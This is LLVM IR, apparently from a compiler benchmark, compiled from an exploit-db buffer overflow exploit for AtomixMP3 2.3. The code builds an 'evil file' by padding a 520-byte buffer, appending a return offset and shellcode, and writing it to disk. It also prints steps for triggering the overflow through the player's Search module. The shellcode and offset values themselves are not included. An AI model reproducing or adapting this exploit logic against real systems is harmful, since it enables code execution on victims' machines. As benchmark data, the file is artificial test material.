; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_29942.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_29942.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [54 x i8] c"\0A\0A##################################################\0A\00", align 1
@.str.1 = private unnamed_addr constant [8 x i8] c"######\0A\00", align 1
@.str.2 = private unnamed_addr constant [36 x i8] c"######          Exploit Atomix 2.3\0A\00", align 1
@.str.3 = private unnamed_addr constant [35 x i8] c"######             By Preth00nker\0A\00", align 1
@.str.4 = private unnamed_addr constant [45 x i8] c"######     Preth00nker [at] gmail [dot] com\0A\00", align 1
@.str.5 = private unnamed_addr constant [45 x i8] c"######         http://www.mexhackteam.org\0A\0A\0A\00", align 1
@.str.6 = private unnamed_addr constant [44 x i8] c"######         http://www.prethoonker.tk\0A\0A\0A\00", align 1
@evilbuffer = common dso_local global i32 0, align 4
@file = common dso_local global i8* null, align 8
@.str.7 = private unnamed_addr constant [3 x i8] c"w+\00", align 1
@.str.8 = private unnamed_addr constant [28 x i8] c" (*) Creating the file: %s\0A\00", align 1
@temp = common dso_local global i32 0, align 4
@.str.9 = private unnamed_addr constant [28 x i8] c" (*) Adding the evilbuffer\0A\00", align 1
@offset = common dso_local global i8* null, align 8
@.str.10 = private unnamed_addr constant [28 x i8] c" (*) Adding the Offset: %s\0A\00", align 1
@shellcode = common dso_local global i8* null, align 8
@.str.11 = private unnamed_addr constant [26 x i8] c" (*) Adding the Sellcode\0A\00", align 1
@.str.12 = private unnamed_addr constant [29 x i8] c" (*) Writting into the file\0A\00", align 1
@.str.13 = private unnamed_addr constant [18 x i8] c"      [ Usage: ]\0A\00", align 1
@.str.14 = private unnamed_addr constant [69 x i8] c"Step 1.- Generate the Evil File into the %ProgramFiles%\\AtomixMP3\\ \0A\00", align 1
@.str.15 = private unnamed_addr constant [28 x i8] c"Step 2.- Run atomixmp3.exe\0A\00", align 1
@.str.16 = private unnamed_addr constant [77 x i8] c"Step 3.- Click On Search module and Click (again) on the unique file found.\0A\00", align 1
@.str.17 = private unnamed_addr constant [13 x i8] c"have fun =)!\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32*, align 8
  store i32 0, i32* %1, align 4
  %3 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([54 x i8], [54 x i8]* @.str, i64 0, i64 0))
  %4 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.1, i64 0, i64 0))
  %5 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([36 x i8], [36 x i8]* @.str.2, i64 0, i64 0))
  %6 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([35 x i8], [35 x i8]* @.str.3, i64 0, i64 0))
  %7 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([45 x i8], [45 x i8]* @.str.4, i64 0, i64 0))
  %8 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([45 x i8], [45 x i8]* @.str.5, i64 0, i64 0))
  %9 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([44 x i8], [44 x i8]* @.str.6, i64 0, i64 0))
  %10 = load i32, i32* @evilbuffer, align 4
  %11 = call i32 @memset(i32 %10, i8 signext 77, i32 520)
  %12 = load i8*, i8** @file, align 8
  %13 = call i32* @fopen(i8* %12, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.7, i64 0, i64 0))
  store i32* %13, i32** %2, align 8
  %14 = load i8*, i8** @file, align 8
  %15 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.8, i64 0, i64 0), i8* %14)
  %16 = load i32, i32* @temp, align 4
  %17 = load i32, i32* @evilbuffer, align 4
  %18 = call i32 @strcpy(i32 %16, i32 %17)
  %19 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.9, i64 0, i64 0))
  %20 = load i32, i32* @temp, align 4
  %21 = load i8*, i8** @offset, align 8
  %22 = call i32 @strcat(i32 %20, i8* %21)
  %23 = load i8*, i8** @offset, align 8
  %24 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.10, i64 0, i64 0), i8* %23)
  %25 = load i32, i32* @temp, align 4
  %26 = load i8*, i8** @shellcode, align 8
  %27 = call i32 @strcat(i32 %25, i8* %26)
  %28 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.11, i64 0, i64 0))
  %29 = load i32, i32* @temp, align 4
  %30 = load i32, i32* @temp, align 4
  %31 = call i32 @strlen(i32 %30)
  %32 = load i32*, i32** %2, align 8
  %33 = call i32 @fwrite(i32 %29, i32 %31, i32 1, i32* %32)
  %34 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str.12, i64 0, i64 0))
  %35 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.13, i64 0, i64 0))
  %36 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([69 x i8], [69 x i8]* @.str.14, i64 0, i64 0))
  %37 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.15, i64 0, i64 0))
  %38 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([77 x i8], [77 x i8]* @.str.16, i64 0, i64 0))
  %39 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.17, i64 0, i64 0))
  %40 = load i32*, i32** %2, align 8
  %41 = call i32 @fclose(i32* %40)
  ret i32 0
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @memset(i32, i8 signext, i32) #1

declare dso_local i32* @fopen(i8*, i8*) #1

declare dso_local i32 @strcpy(i32, i32) #1

declare dso_local i32 @strcat(i32, i8*) #1

declare dso_local i32 @fwrite(i32, i32, i32, i32*) #1

declare dso_local i32 @strlen(i32) #1

declare dso_local i32 @fclose(i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
